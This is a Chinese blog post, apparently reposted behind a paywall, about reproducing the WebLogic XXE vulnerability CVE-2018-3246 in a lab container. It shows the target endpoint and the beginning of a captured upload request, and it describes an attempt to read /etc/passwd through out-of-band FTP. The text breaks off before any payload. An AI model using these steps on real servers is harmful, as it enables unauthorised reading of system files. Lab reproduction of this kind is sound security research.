CVE-2018-3246 weblogic xxe

于 2019-08-27 16:58:00 发布
阅读量1.9k 收藏
点赞数
原文链接:http://www.cnblogs.com/mrhonest/p/11419386.html
版权
该博客详细介绍了CVE-2018-3246,一个针对Weblogic服务器的XXE(XML外部实体)漏洞。通过使用P牛2018-2894的容器进行测试,作者演示了如何导入测试用例,抓取上传数据包,并修改payload以尝试利用此漏洞。然而,由于Weblogic运行的账户权限限制,FTP服务虽然接收到连接信息,但无法读取file://etc/passwd。问题的根本原因在于账户权限不足。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

使用P牛2018-2894的容器

1431916-20190827165312626-1956764548.png

http://192.168.245.130:7001/ws_utc/begin.do

导入测试用例

1431916-20190827165422603-2083236137.png

上传时抓取数据包

POST /ws_utc/resources/ws/config/import?timestamp=1566895391388 HTTP/1.1
Host: 192.168.245.130:7001
Content-Length: 215
Cache-Control: max-age=0
Origin: http://192.168.245.130:7001
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycneAkX3GCCBYEERe
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: te
最低0.47元/天 解锁文章
ddr12231
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值